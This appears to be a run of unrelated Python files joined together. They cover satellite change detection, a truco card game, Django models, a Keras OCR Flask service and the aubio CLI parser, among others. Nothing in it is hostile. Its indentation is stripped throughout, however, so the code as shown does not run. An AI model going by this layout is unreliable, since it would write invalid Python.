img_pad = np.pad(img, [(0, h_toadd), (0, w_toadd), (0,0)], mode='constant')
return img_pad
def crop(img, crop_size, stride):
cropped_images = []
h, w, c = img.shape
n_h = int(h/stride)
n_w = int(w/stride)
for i in range(n_h):
for j in range(n_w):
crop_img = img[(i * stride):((i * stride) + crop_size), (j * stride):((j * stride) + crop_size), :]
if (crop_img.shape) == (crop_size, crop_size, c):
cropped_images.append(crop_img)
return cropped_images
def uncrop(shape, crops, crop_size, stride):
img = np.zeros(shape)
h, w, c = shape
n_h = int(h/stride)
n_w = int(w/stride)
for i in range(n_h):
for j in range(n_w):
img[(i * stride):((i * stride) + crop_size), (j * stride):((j * stride) + crop_size), :] = crops[i * n_w + j]
return img
def unpad(shape, img):
h, w, c = shape
return img[:h, :w, :]
def getCoord(geoTiff):
ulx, pixelWidth, b, uly, d, pixelHeight = geoTiff.GetGeoTransform() # b and d are respectively parameters representing x and y rotation respectively
lrx = ulx + (geoTiff.RasterXSize * pixelWidth)
lry = uly + (geoTiff.RasterYSize * pixelHeight)
return [ulx, uly, lrx, lry]
def createGeoCM(cmName, geoTiff, cmArray):
ulx, pixelWidth, b, uly, d, pixelHeight = geoTiff.GetGeoTransform() # b and d are respectively parameters representing x and y rotation respectively
originX = int(ulx)
originY = int(uly)
if(cmArray.ndim == 3):
cmArray = np.squeeze(cmArray)
rows = cmArray.shape[0]
cols = cmArray.shape[1]
driver = gdal.GetDriverByName('GTiff')
GDT_dtype = gdal.GDT_Byte
band_num = 1
band_id = 0 # first band in case of multiple bands
outRaster = driver.Create(cmName, cols, rows, band_num, GDT_dtype)
outRaster.SetGeoTransform((originX, pixelWidth, b, originY, d, pixelHeight))
outband = outRaster.GetRasterBand(band_id+1)
outband.WriteArray(cmArray)
# Now save the change map
prj = geoTiff.GetProjection()
outRasterSRS = osr.SpatialReference(wkt=prj)
outRaster.SetProjection(outRasterSRS.ExportToWkt())
outband.FlushCache()
def trim(img, x, y, crop_size):
return(img[x:x+crop_size, y:y+crop_size, :])
def random_transform(img, val):
return {
0: lambda img: img,
1: lambda img: np.rot90(img,1),
2: lambda img: np.rot90(img,2),
3: lambda img: np.rot90(img,3),
4: lambda img: np.flipud(img),
5: lambda img: np.fliplr(img)
}[val](img)
# def createDataset_fromOnera(aug, cpt, crop_size, stride, channels, folders, dataset_dir, labels_dir):
# train_images = []
# train_labels = []
# if(aug==True): # select random crops and apply transformation
# for f in folders:
# raster1 = build_raster(dataset_dir + f + '/imgs_1_rect/', channels)
# raster2 = build_raster(dataset_dir + f + '/imgs_2_rect/', channels)
# raster = np.concatenate((raster1,raster2), axis=2)
# cm = gdal.Open(labels_dir + f + '/cm/' + f + '-cm.tif').ReadAsArray()
# cm = np.expand_dims(cm, axis=2)
# cm -= 1 # the change map has values 1 for no change and 2 for change ---> scale back to 0 and 1
# for i in range(cpt):
# x = random.randint(0,raster.shape[0]-crop_size)
# y = random.randint(0,raster.shape[1]-crop_size)
# img = trim(raster, x, y, crop_size)
# label = trim(cm, x, y, crop_size)
# n = random.randint(0,5)
# train_images.append(random_transform(img, n))
# train_labels.append(random_transform(label, n))
# else:
# for f in folders:
# raster1 = build_raster(dataset_dir + f + '/imgs_1_rect/')
# raster2 = build_raster(dataset_dir + f + '/imgs_2_rect/')
# raster = np.concatenate((raster1,raster2), axis=2)
# cm = gdal.Open(labels_dir + f + '/cm/' + f + '-cm.tif').ReadAsArray()
# cm = np.expand_dims(cm, axis=2)
# cm -= 1 # the change map has values 1 for no change and 2 for change ---> scale back to 0 and 1
# padded_raster = pad(raster, crop_size)
# train_images = train_images + crop(padded_raster, crop_size, stride)
# padded_cm = pad(cm, crop_size)
# train_labels = train_labels + crop(padded_cm, crop_size, stride)
# # Create inputs and labels for the Neural Network
# inputs = np.asarray(train_images, dtype='float32')
# labels = np.asarray(train_labels, dtype='float32')
# return inputs, labels
def createDataset_fromOnera(aug, cpt, crop_size, stride, channels, folders, dataset_dir, labels_dir):
train_images = []
train_labels = []
if(aug==True): # select random crops and apply transformation
for f in folders:
raster1 = build_raster(dataset_dir + f + '/imgs_1_rect/', channels)
raster2 = build_raster(dataset_dir + f + '/imgs_2_rect/', channels)
raster = np.concatenate((raster1,raster2), axis=2)
cm = gdal.Open(labels_dir + f + '/cm/' + f + '-cm.tif').ReadAsArray()
cm = np.expand_dims(cm, axis=2)
cm -= 1 # the change map has values 1 for no change and 2 for change ---> scale back to 0 and 1
print('*** City %s started ***' %f)
for i in range(cpt):
x = random.randint(0,raster.shape[0]-crop_size)
y = random.randint(0,raster.shape[1]-crop_size)
label = trim(cm, x, y, crop_size)
_, counts = np.unique(label, return_counts=True)
img = trim(raster, x, y, crop_size)
if(float(len(counts)==1 or counts[1]/(np.sum(counts)))<0.1):
n = random.randint(0,5)
train_images.append(random_transform(img, n))
train_labels.append(random_transform(label, n))
else: # if change pixels cover less than 1% of the image, discard the patch
for n in range(6):
train_images.append(random_transform(img, n))
train_labels.append(random_transform(label, n))
print('*** City %s finished ***' %f)
else:
for f in folders:
raster1 = build_raster(dataset_dir + f + '/imgs_1_rect/')
raster2 = build_raster(dataset_dir + f + '/imgs_2_rect/')
raster = np.concatenate((raster1,raster2), axis=2)
cm = gdal.Open(labels_dir + f + '/cm/' + f + '-cm.tif').ReadAsArray()
cm = np.expand_dims(cm, axis=2)
cm -= 1 # the change map has values 1 for no change and 2 for change ---> scale back to 0 and 1
padded_raster = pad(raster, crop_size)
train_images = train_images + crop(padded_raster, crop_size, stride)
padded_cm = pad(cm, crop_size)
train_labels = train_labels + crop(padded_cm, crop_size, stride)
# Create inputs and labels for the Neural Network
inputs = np.asarray(train_images, dtype='float32')
labels = np.asarray(train_labels, dtype='float32')
# Remove doubles
inputs, indices = np.unique(inputs, axis=0, return_index=True)
labels = labels[indices]
return inputs, labels
def getBandNumbers(channels):
return {
3:[2,3,4], # RGB
4: [2,3,4,8], # 10m resolution
7: [1,2,3,4,8,10,11], #10m + 60m resolution
10: [2,3,4,5,6,7,8,9,12,13], #10m + 20m resolution
13: [1,2,3,4,5,6,7,8,9,10,11,12,13]
}[channels] # full raster |
#-*- coding: utf-8 -*-
#!/usr/bin/env python
'''
Created on Jan 05, 2011
@author: Wander Jardim
'''
import os
import sys
def prepara_path():
"""Carrega o diretório fonte no sys.path.
Isso só será necessário quando estiver executando uma distribuição fonte.
Distribuições binária já garantem que o caminho do módulo contém os módulos
de qualquer maneira.
"""
try:
__file__
except NameError, e:
print e
else:
rel = lambda s: os.path.abspath(os.path.join(os.path.dirname(__file__), s))
sys.path.insert(0, rel("lib.zip"))
if os.path.exists("gamelib"):
sys.path.insert(1, "gamelib")
prepara_path()
import logging
log = logging.getLogger('jogo')
log.debug("importado")
import cocos
from cocos.director import director
from cocos.actions import *
from cocos.scene import Scene
from pyglet.event import EventDispatcher
import pyglet
from hud import Hud
import game_audio
from bg_layer import BGLayer
from logicaTruco import *
class JogoT(cocos.layer.Layer):
def __init__(self):
super(JogoT, self).__init__()
# Configurando camadas
# HUD
self.hud = Hud(self)
self.add(self.hud, z=-1)
self.alturaTela, self.larguraTela = director.get_window_size()
print "Altura: %s - Largura: %s" %(self.alturaTela, self.larguraTela)
baralho = Baralho()
baralho.embaralhar()
jogador1 = Jogador("Wander", 1)
jogador2 = Jogador("Luana", 2)
jogador3 = Jogador("Marluce", 1)
jogador4 = Jogador("Ataide", 2)
jogadoresGlobal = [jogador1, jogador2, jogador3, jogador4]
mesa = Mesa(jogadoresGlobal, baralho)
mesa.definirEquipes()
mesa.definirOrdemJogadores()
mesa.distrubuirCartas()
rectSprites = jogador1.mao[0].imagem.get_rect()
Sprite1 = jogador1.mao[0].imagem
Sprite1.position = 0,0
Sprite1.image_anchor_x = 0
Sprite1.image_anchor_y = 0
Sprite2 = jogador1.mao[2].imagem
Sprite2.position = 0,0
Sprite2.image_anchor_x = -100
Sprite2.image_anchor_y = -100
self.add(Sprite1, z=1 )
self.add(Sprite2, z=1 )
print "Rect carta:"
print rectSprites
pos = 325
for carta in jogador1.mao:
#carta.imagem.position = (12, 10)
#carta.imagem.anchor_x = "top"
#self.add(carta.imagem, z=1 )
pos += 76
rectSprites = carta.imagem.get_rect()
print "Rect carta:"
print "Largura: %s " % rectSprites.width
print "Altura: %s" % rectSprites.height
#cartaJogador1 = jogador1.jogarCarta(randrange(0, len(mesa.equipes[0].jogadores[0].mao)))
#mesa.cartas.append(cartaJogador1)
#self.remove(testeImg)
def desenhaMesaJogo(self):
pass
def on_quit(self):
# called by esc
director.scene.end()
director.scene.end()
def run():
return JogoT()
if __name__ == '__main__':
director.init(width=800, height=600, do_not_scale=True)
main_scene = Scene (BGLayer("mesa"), run())
director.run(main_scene) |
class Rectangle:
def __init__(self, x, y, width, height):
self.x = x
self.y = y
self.width = width
self.height = height
def get_figure(self):
return f'Rectangle({self.x}, {self.y}, {self.width}, {self.height}).'
class Circle:
def __init__(self, x, y, r):
self.x = x
self.y = y
self.r = r
def get_figure(self):
return f'Circle({self.x}, {self.y}, {self.r}).'
|
class A:
def __init__(self):
print("A")
class B(A):
# def __init__(self):
# print("B")
pass
class C(A):
# def __init__(self):
# print("C")
pass
class D(B,C):
pass
D() |
#!/usr/bin/env python3
from aws_cdk import core
from test_cdk.test_cdk_stack import TestCdkStack
app = core.App()
TestCdkStack(app, "test-cdk")
app.synth()
|
#%%
# -*- coding: utf-8 -*-
# Section 1
COM = r'COM27'#r'COM21'
motor = 'theta'
def degreesToSteps(degrees):
return int(9140000*(degrees/360))
from motor_driver_interface import MotorDriver
MD = MotorDriver(COM)
#MD.alignMotor(motor)
#%%
# Section 2
MD.turnMotor(motor, degreesToSteps(1), 'cw')
#%%
# Section 3
MD.turnMotor(motor, degreesToSteps(3), 'ccw')
#%%
# Section 4
MD.alignMotor(motor) |
import random
import numpy as np
from pandas import DataFrame
from sklearn.preprocessing import normalize
from math import acos, pi, isnan
from scipy.stats import entropy
np.random.seed(13)
NUM_EMOTIONS = 6
NDIMS = 300
def read_emo_lemma(aline):
"""
Splits a line into lemma l, emotion e, and l(e).
l(e) := 1 if lemma l has emotion e according to the lexicon
l(e) := 0 otherwise
"""
split = aline.split()
return split[0], split[1], int(split[2])
def clip_to_range_0_1(v):
v[v <= 0.] = 1e-15
v[v > 1.] = 1.0
def kl_divergence(true, pred):
clip_to_range_0_1(true)
clip_to_range_0_1(pred)
return entropy(true, pred)
def partition (list, n):
return [list[i::n] for i in range(n)]
word2idx = {}
line_idx = 0
with open('resources/emotion_specific/bilstm_300d.txt', 'r', encoding='UTF-8') as f:
next(f) # skip header
for line in f:
values = line.split()
# probably an error occurred during tokenization
if len(values) != NDIMS + 1:
continue
word = values[0]
# only one vector for each word
try:
word2idx[word]
except:
word2idx[word] = line_idx
line_idx += 1
def build_Y(lexicon, lemma2index, w2i, partition):
uniform_distr = np.asarray([1 / NUM_EMOTIONS] * NUM_EMOTIONS)
majority_distr = np.asarray([0,0,0,1,0,0]) + 1e-12
corpus_prior_distr = np.asarray([1555,761,2815,8240,3830,3849])
corpus_prior_distr = corpus_prior_distr / np.sum(corpus_prior_distr)
y_l = np.asarray(DataFrame(lexicon, dtype='float32').T.fillna(0), dtype='float32')
# y = np.tile(corpus_prior_distr, (len(partition), 1))
held_out_indices = []
idx_translator = {}
y_test = np.zeros((len(w2i), NUM_EMOTIONS))
i = 0
for word, idx in lemma2index.items():
try:
# if word in corpus
idx_T = w2i[word] # get index of word in T
if idx in partition:
held_out_indices.append(idx_T)
y_test[i] = y_l[idx]
idx_translator[idx_T] = i
i += 1
except KeyError:
continue
# y = normalize(y, axis=1, norm='l1', copy=False) # turn multi-labels into prob distribution
# y_test = normalize(y_test, axis=1, norm='l1', copy=False)
return uniform_distr, held_out_indices, y_test, idx_translator
_lexicon = dict()
lexicon = dict()
lemma2index = dict()
with open('resources/data/emolex.txt', 'r') as f:
emo_idx = 0 # anger: 0, anticipation: 1, disgust: 2, fear: 3, joy: 4, sadness: 5, surprise: 6, trust: 7
i = 0
for l in f:
lemma, emotion, has_emotion = read_emo_lemma(l)
if emotion == 'anger': # i.e. if lemma not in lexicon.keys()
_lexicon[i] = np.empty(shape=(NUM_EMOTIONS,))
if emotion in ['positive', 'negative', 'anticipation', 'trust']:
continue
_lexicon[i][emo_idx] = has_emotion
if emo_idx < NUM_EMOTIONS - 1:
emo_idx += 1
else:
norm = np.sum(_lexicon[i])
if norm != 0:
lemma2index[lemma] = i
lexicon[i] = _lexicon[i] / norm
i += 1
# reset index - next line contains a new lemma
emo_idx = 0
print(len(lemma2index))
intersection = [idx for lemma, idx in lemma2index.items() if lemma in word2idx.keys()]
indices = list(intersection)
random.shuffle(indices)
partitions = partition(indices, 10)
kls = []
for p in partitions:
baseline, heldout, y_test, idx_translator = build_Y(lexicon, lemma2index, word2idx, p)
divergences = []
for i in heldout:
i_ = idx_translator[i]
divergences.append(kl_divergence(y_test[i_], baseline))
kl = np.sum(np.asarray(divergences)) / len(divergences)
kls.append(kl)
print(kl)
result = np.sum(np.asarray(kls)) / len(kls)
print('Average kl:', result)
# remove 0 vectors from both y_test and the baseline
|
calendar_events_mapping = {
'action': '/char/UpcomingCalendarEvents.xml.aspx',
'fields': ['eventID', 'ownerName', 'eventDate', 'eventTitle', 'duration',
'eventText']
}
contracts_mapping = {
'action': '/char/Contracts.xml.aspx',
'fields': ['contractID', 'startStationID', 'status', 'price']
}
contract_items_mapping = {
'action': '/char/ContractItems.xml.aspx',
'fields': ['typeID', 'quantity', 'included']
}
corp_contracts_mapping = {
'action': '/corp/Contracts.xml.aspx',
'fields': ['contractID', 'startStationID', 'type', 'status', 'price',
'title']
}
corp_contract_items_mapping = {
'action': '/corp/ContractItems.xml.aspx',
'fields': ['typeID', 'quantity', 'included']
}
|
from django.db import models
from django.contrib.auth.models import User
from PIL import Image
DEPARTMENTS = (
("CE", "Chemical Engineering"),
("BioTech", "Biotechnology"),
("Civil", "Civil Engineering"),
("CSE", "Computer Science and Engineering"),
("ECE", "Electronics and Communication Engineering"),
("EEE", "Electronics and Electrical Engineering"),
("EP", "Engineering Physics"),
("MnC", "Mathematics and Computing"),
("Mech", "Mechanical Engineering"),
("Design ", "Design "),
("BnB", "Biosciences and Bioengineering"),
("None", "None"),
)
CLUBS = (
("Alcher", "Alcheringa"),
("Cadence", "Cadence"),
("AnR", "Anchorenza and RadioG"),
("Fine Arts", "Fine Arts"),
("Montage", "Montage"),
("Lumiere", "Lumiere"),
("Octaves", "Octaves"),
("Expressions", "Expressions"),
("LitSoc-DebSoc", "LitSoc-DebSoc"),
("Aeromodelling", "Aeromodelling"),
("Astronomy", "Astronomy"),
("Coding", "Coding"),
("CnA", "Consulting and Analytics"),
("Electronics", "Electronics"),
("Prakriti", "Prakriti"),
("FnE", "Finance and Economics"),
("Robotics", "Robotics "),
("ACUMEN", "ACUMEN"),
("TechEvince", "TechEvince"),
("Green Automobile", "Green Automobile"),
("EDC", "Entrepreneurial Development Cell"),
("Udgam", "Udgam"),
("Techniche", "Techniche"),
("None", "None"),
)
BATCH = (
("2018", "2018"),
("2019", "2019"),
("2020", "2020"),
("2021", "2021"),
("2022", "2022"),
("2023", "2023"),
("2024", "2024"),
("None", "None"),
)
ADDRESS_TYPE = (
("H", "Home Address"),
("W", "Work/Office Address")
)
class Profile(models.Model):
user = models.OneToOneField(User, related_name="profile", on_delete=models.CASCADE)
image = models.ImageField(default='default.png', upload_to='profile_pics')
is_merchant = models.BooleanField(default=False)
department = models.CharField(max_length=120, choices=DEPARTMENTS, default='None')
club = models.CharField(max_length=120, choices=CLUBS, default='None')
batch = models.CharField(max_length=4, choices=BATCH, default='None')
def __str__(self):
return f'{self.user.username} Profile'
def get_email(self):
return f'{self.user.email}'
def save(self, *args, **kwargs):
super().save(*args, **kwargs)
img = Image.open(self.image.path)
if img.height > 300 or img.width > 300:
output_size = (300, img.width*(img.height/300))
img.thumbnail(output_size)
img.save(self.image.path)
class Address(models.Model):
user = models.ForeignKey(User, related_name="addresses", on_delete=models.CASCADE)
zip = models.CharField(max_length=10, blank=False, null=False)
house_no = models.CharField(max_length=120, blank=False, null=False)
area = models.CharField(max_length=120, blank=False, null=False)
city = models.CharField(max_length=120, blank=False, null=False)
state = models.CharField(max_length=120, blank=False, null=False)
landmark = models.CharField(max_length=120, blank=True, null=True)
name = models.CharField(max_length=120, blank=False, null=False)
mobile_no = models.CharField(max_length=10, blank=False, null=False)
alternate_no = models.CharField(max_length=10, blank=True, null=True)
address_type = models.CharField(max_length=120, choices=ADDRESS_TYPE, default='H')
def __str__(self):
return str(self.user.username)
# def get_fulladdress(self):
|
# -*- coding: utf-8 -*-
# USAGE
# Start the server:
# python app.py
# Submit a request via cURL:
# curl --data input_word="good" http://localhost:5000/predict
# curl --data input_word="am" http://localhost:5000/predict
# curl --data input_word="bad" http://localhost:5000/predict
# import the necessary packages
import numpy as np
import flask
import io
import tensorflow as tf
import os
import itertools
import codecs
import re
import json
import datetime
import cairocffi as cairo
import editdistance
import numpy as np
from scipy import ndimage
from keras import backend as K
from keras.layers.convolutional import Conv2D, MaxPooling2D
from keras.layers import Input, Dense, Activation
from keras.layers import Reshape, Lambda
from keras.layers.merge import add, concatenate
from keras.models import Model
from keras.layers.recurrent import GRU
from keras.optimizers import SGD
from keras.utils.data_utils import get_file
from keras.preprocessing import image
import keras.callbacks
import argparse
from src.TextImageGenerator import TextImageGenerator
from src.utils import *
parser = argparse.ArgumentParser("bnp_app")
parser.add_argument("--weight_path", type=str, default="./model/weights24.h5", help="path for the model weight")
args = parser.parse_args()
# initialize our Flask application and the Keras model
app = flask.Flask(__name__)
model = None
np.random.seed(55)
def build_model(weight_path):
img_w = 128
# Input Parameters
img_h = 64
words_per_epoch = 16000
val_split = 0.2
val_words = int(words_per_epoch * (val_split))
# Network parameters
conv_filters = 16
kernel_size = (3, 3)
pool_size = 2
time_dense_size = 32
rnn_size = 512
minibatch_size = 32
if K.image_data_format() == 'channels_first':
input_shape = (1, img_w, img_h)
else:
input_shape = (img_w, img_h, 1)
fdir = os.path.dirname(get_file('wordlists.tgz',
origin='http://www.mythic-ai.com/datasets/wordlists.tgz', untar=True))
img_gen = TextImageGenerator(monogram_file=os.path.join(fdir, 'wordlist_mono_clean.txt'),
bigram_file=os.path.join(fdir, 'wordlist_bi_clean.txt'),
minibatch_size=minibatch_size,
img_w=img_w,
img_h=img_h,
downsample_factor=(pool_size ** 2),
val_split=words_per_epoch - val_words
)
act = 'relu'
input_data = Input(name='the_input', shape=input_shape, dtype='float32')
inner = Conv2D(conv_filters, kernel_size, padding='same',
activation=act, kernel_initializer='he_normal',
name='conv1')(input_data)
inner = MaxPooling2D(pool_size=(pool_size, pool_size), name='max1')(inner)
inner = Conv2D(conv_filters, kernel_size, padding='same',
activation=act, kernel_initializer='he_normal',
name='conv2')(inner)
inner = MaxPooling2D(pool_size=(pool_size, pool_size), name='max2')(inner)
conv_to_rnn_dims = (img_w // (pool_size ** 2), (img_h // (pool_size ** 2)) * conv_filters)
inner = Reshape(target_shape=conv_to_rnn_dims, name='reshape')(inner)
# cuts down input size going into RNN:
inner = Dense(time_dense_size, activation=act, name='dense1')(inner)
# Two layers of bidirectional GRUs
# GRU seems to work as well, if not better than LSTM:
gru_1 = GRU(rnn_size, return_sequences=True, kernel_initializer='he_normal', name='gru1')(inner)
gru_1b = GRU(rnn_size, return_sequences=True, go_backwards=True, kernel_initializer='he_normal', name='gru1_b')(inner)
gru1_merged = add([gru_1, gru_1b])
gru_2 = GRU(rnn_size, return_sequences=True, kernel_initializer='he_normal', name='gru2')(gru1_merged)
gru_2b = GRU(rnn_size, return_sequences=True, go_backwards=True, kernel_initializer='he_normal', name='gru2_b')(gru1_merged)
# transforms RNN output to character activations:
inner = Dense(img_gen.get_output_size(), kernel_initializer='he_normal',
name='dense2')(concatenate([gru_2, gru_2b]))
y_pred = Activation('softmax', name='softmax')(inner)
Model(inputs=input_data, outputs=y_pred).summary()
labels = Input(name='the_labels', shape=[img_gen.absolute_max_string_len], dtype='float32')
input_length = Input(name='input_length', shape=[1], dtype='int64')
label_length = Input(name='label_length', shape=[1], dtype='int64')
# Keras doesn't currently support loss funcs with extra parameters
# so CTC loss is implemented in a lambda layer
loss_out = Lambda(ctc_lambda_func, output_shape=(1,), name='ctc')([y_pred, labels, input_length, label_length])
# clipnorm seems to speeds up convergence
sgd = SGD(lr=0.02, decay=1e-6, momentum=0.9, nesterov=True, clipnorm=5)
model = Model(inputs=[input_data, labels, input_length, label_length], outputs=loss_out)
# the loss calc occurs elsewhere, so use a dummy lambda func for the loss
model.compile(loss={'ctc': lambda y_true, y_pred: y_pred}, optimizer=sgd)
model.load_weights(weight_path)
# captures output of softmax so we can decode the output during visualization
#test_func = K.function([input_data], [y_pred])
#global model_p
model_p = Model(inputs=input_data, outputs=y_pred)
#global graph
graph = tf.get_default_graph()
return model_p, graph
def decode_predict_ctc(out, top_paths = 1):
results = []
beam_width = 5
if beam_width < top_paths:
beam_width = top_paths
for i in range(top_paths):
lables = K.get_value(K.ctc_decode(out, input_length=np.ones(out.shape[0])*out.shape[1],
greedy=False, beam_width=beam_width, top_paths=top_paths)[0][i])[0]
text = labels_to_text(lables)
results.append(text)
return results
def predict_a_image(mdoel, a, top_paths = 1):
c = np.expand_dims(a.T, axis=0)
net_out_value = mdoel.predict(c)
top_pred_texts = decode_predict_ctc(net_out_value, top_paths)
return top_pred_texts
model_p, graph = build_model(args.weight_path)
@app.route("/predict", methods=["POST"])
def predict():
# initialize the data dictionary that will be returned from the
# view
data = {}
if flask.request.method == "POST":
if flask.request.get_data():
input_word = flask.request.form.get('input_word', '')
h = 64
w = 128
a = paint_text(input_word,h = h, w = w)
b = a.reshape((h, w))
c = np.expand_dims(a.T, axis=0)
with graph.as_default():
net_out_value = model_p.predict(c)
pred_texts = decode_predict_ctc(net_out_value)
top_3_paths = predict_a_image(model_p, a, top_paths = 3)
data["pred_texts"] = pred_texts
data["top_3_paths"] = top_3_paths
# return the data dictionary as a JSON response
return flask.jsonify(data)
# if this is the main thread of execution first load the model and
# then start the server
if __name__ == "__main__":
print(("* Loading Keras model and Flask starting server..."
"please wait until server has fully started"))
app.run(host='0.0.0.0')
|
#! /usr/bin/env python
# -*- coding: utf-8 -*-
"""aubio command line tool
This file was written by Paul Brossier <piem@aubio.org> and is released under
the GNU/GPL v3.
Note: this script is mostly about parsing command line arguments. For more
readable code examples, check out the `python/demos` folder."""
import sys
import argparse
import aubio
def aubio_parser():
epilog = 'use "%(prog)s <command> --help" for more info about each command'
parser = argparse.ArgumentParser(epilog=epilog)
parser.add_argument('-V', '--version', help="show version",
action="store_true", dest="show_version")
subparsers = parser.add_subparsers(title='commands', dest='command',
parser_class= AubioArgumentParser,
metavar="")
parser_add_subcommand_help(subparsers)
parser_add_subcommand_onset(subparsers)
parser_add_subcommand_pitch(subparsers)
parser_add_subcommand_beat(subparsers)
parser_add_subcommand_tempo(subparsers)
parser_add_subcommand_notes(subparsers)
parser_add_subcommand_mfcc(subparsers)
parser_add_subcommand_melbands(subparsers)
parser_add_subcommand_quiet(subparsers)
parser_add_subcommand_cut(subparsers)
return parser
def parser_add_subcommand_help(subparsers):
# global help subcommand
subparsers.add_parser('help',
help='show help message',
formatter_class = argparse.ArgumentDefaultsHelpFormatter)
def parser_add_subcommand_onset(subparsers):
# onset subcommand
subparser = subparsers.add_parser('onset',
help='estimate time of onsets (beginning of sound event)',
formatter_class = argparse.ArgumentDefaultsHelpFormatter)
subparser.add_input()
subparser.add_buf_hop_size()
helpstr = "onset novelty function"
helpstr += " <default|energy|hfc|complex|phase|specdiff|kl|mkl|specflux>"
subparser.add_method(helpstr=helpstr)
subparser.add_threshold()
subparser.add_silence()
subparser.add_minioi()
subparser.add_time_format()
subparser.add_verbose_help()
subparser.set_defaults(process=process_onset)
def parser_add_subcommand_pitch(subparsers):
# pitch subcommand
subparser = subparsers.add_parser('pitch',
help='estimate fundamental frequency (monophonic)')
subparser.add_input()
subparser.add_buf_hop_size(buf_size=2048)
helpstr = "pitch detection method <default|yinfft|yin|mcomb|fcomb|schmitt>"
subparser.add_method(helpstr=helpstr)
subparser.add_threshold()
subparser.add_pitch_unit()
subparser.add_silence()
subparser.add_time_format()
subparser.add_verbose_help()
subparser.set_defaults(process=process_pitch)
def parser_add_subcommand_beat(subparsers):
# beat subcommand
subparser = subparsers.add_parser('beat',
help='estimate location of beats')
subparser.add_input()
subparser.add_buf_hop_size(buf_size=1024, hop_size=512)
subparser.add_time_format()
subparser.add_verbose_help()
subparser.set_defaults(process=process_beat)
def parser_add_subcommand_tempo(subparsers):
# tempo subcommand
subparser = subparsers.add_parser('tempo',
help='estimate overall tempo in bpm')
subparser.add_input()
subparser.add_buf_hop_size(buf_size=1024, hop_size=512)
subparser.add_time_format()
subparser.add_verbose_help()
subparser.set_defaults(process=process_tempo)
def parser_add_subcommand_notes(subparsers):
# notes subcommand
subparser = subparsers.add_parser('notes',
help='estimate midi-like notes (monophonic)')
subparser.add_input()
subparser.add_buf_hop_size()
subparser.add_time_format()
subparser.add_verbose_help()
subparser.set_defaults(process=process_notes)
def parser_add_subcommand_mfcc(subparsers):
# mfcc subcommand
subparser = subparsers.add_parser('mfcc',
help='extract Mel-Frequency Cepstrum Coefficients')
subparser.add_input()
subparser.add_buf_hop_size()
subparser.add_time_format()
subparser.add_verbose_help()
subparser.set_defaults(process=process_mfcc)
def parser_add_subcommand_melbands(subparsers):
# melbands subcommand
subparser = subparsers.add_parser('melbands',
help='extract energies in Mel-frequency bands')
subparser.add_input()
subparser.add_buf_hop_size()
subparser.add_time_format()
subparser.add_verbose_help()
subparser.set_defaults(process=process_melbands)
def parser_add_subcommand_quiet(subparsers):
# quiet subcommand
subparser = subparsers.add_parser('quiet',
help='extract timestamps of quiet and loud regions')
subparser.add_input()
subparser.add_hop_size()
subparser.add_silence()
subparser.add_time_format()
subparser.add_verbose_help()
subparser.set_defaults(process=process_quiet)
def parser_add_subcommand_cut(subparsers):
# cut subcommand
subparser = subparsers.add_parser('cut',
help='slice at timestamps')
subparser.add_input()
helpstr = "onset novelty function"
helpstr += " <default|energy|hfc|complex|phase|specdiff|kl|mkl|specflux>"
subparser.add_method(helpstr=helpstr)
subparser.add_buf_hop_size()
subparser.add_silence()
subparser.add_threshold(default=0.3)
subparser.add_minioi()
subparser.add_slicer_options()
subparser.add_time_format()
subparser.add_verbose_help()
subparser.set_defaults(process=process_cut)
class AubioArgumentParser(argparse.ArgumentParser):
def add_input(self):
self.add_argument("source_uri", default=None, nargs='?',
help="input sound file to analyse", metavar = "<source_uri>")
self.add_argument("-i", "--input", dest = "source_uri2",
help="input sound file to analyse", metavar = "<source_uri>")
self.add_argument("-r", "--samplerate",
metavar = "<freq>", type=int,
action="store", dest="samplerate", default=0,
help="samplerate at which the file should be represented")
def add_verbose_help(self):
self.add_argument("-v","--verbose",
action="count", dest="verbose", default=1,
help="make lots of noise [default]")
self.add_argument("-q","--quiet",
action="store_const", dest="verbose", const=0,
help="be quiet")
def add_buf_hop_size(self, buf_size=512, hop_size=256):
self.add_buf_size(buf_size=buf_size)
self.add_hop_size(hop_size=hop_size)
def add_buf_size(self, buf_size=512):
self.add_argument("-B","--bufsize",
action="store", dest="buf_size", default=buf_size,
metavar = "<size>", type=int,
help="buffer size [default=%d]" % buf_size)
def add_hop_size(self, hop_size=256):
self.add_argument("-H","--hopsize",
metavar = "<size>", type=int,
action="store", dest="hop_size", default=hop_size,
help="overlap size [default=%d]" % hop_size)
def add_method(self, method='default', helpstr='method'):
self.add_argument("-m","--method",
metavar = "<method>", type=str,
action="store", dest="method", default=method,
help="%s [default=%s]" % (helpstr, method))
def add_threshold(self, default=None):
self.add_argument("-t","--threshold",
metavar = "<threshold>", type=float,
action="store", dest="threshold", default=default,
help="threshold [default=%s]" % default)
def add_silence(self):
self.add_argument("-s", "--silence",
metavar = "<value>", type=float,
action="store", dest="silence", default=-70,
help="silence threshold")
def add_minioi(self, default="12ms"):
self.add_argument("-M", "--minioi",
metavar = "<value>", type=str,
action="store", dest="minioi", default=default,
help="minimum Inter-Onset Interval [default=%s]" % default)
def add_pitch_unit(self, default="Hz"):
help_str = "frequency unit, should be one of Hz, midi, bin, cent"
help_str += " [default=%s]" % default
self.add_argument("-u", "--pitch-unit",
metavar = "<value>", type=str,
action="store", dest="pitch_unit", default=default,
help=help_str)
def add_time_format(self):
helpstr = "select time values output format (samples, ms, seconds)"
helpstr += " [default=seconds]"
self.add_argument("-T", "--time-format",
metavar='format',
dest="time_format",
default=None,
help=helpstr)
def add_slicer_options(self):
self.add_argument("-o","--output", type = str,
metavar = "<outputdir>",
action="store", dest="output_directory", default=None,
help="specify path where slices of the original file should be created")
self.add_argument("--cut-until-nsamples", type = int,
metavar = "<samples>",
action = "store", dest = "cut_until_nsamples", default = None,
help="how many extra samples should be added at the end of each slice")
self.add_argument("--cut-every-nslices", type = int,
metavar = "<samples>",
action = "store", dest = "cut_every_nslices", default = None,
help="how many slices should be groupped together at each cut")
self.add_argument("--cut-until-nslices", type = int,
metavar = "<slices>",
action = "store", dest = "cut_until_nslices", default = None,
help="how many extra slices should be added at the end of each slice")
# some utilities
def samples2seconds(n_frames, samplerate):
return "%f\t" % (n_frames / float(samplerate))
def samples2milliseconds(n_frames, samplerate):
return "%f\t" % (1000. * n_frames / float(samplerate))
def samples2samples(n_frames, _samplerate):
return "%d\t" % n_frames
def timefunc(mode):
if mode is None or mode == 'seconds' or mode == 's':
return samples2seconds
elif mode == 'ms' or mode == 'milliseconds':
return samples2milliseconds
elif mode == 'samples':
return samples2samples
else:
raise ValueError("invalid time format '%s'" % mode)
# definition of processing classes
class default_process(object):
def __init__(self, args):
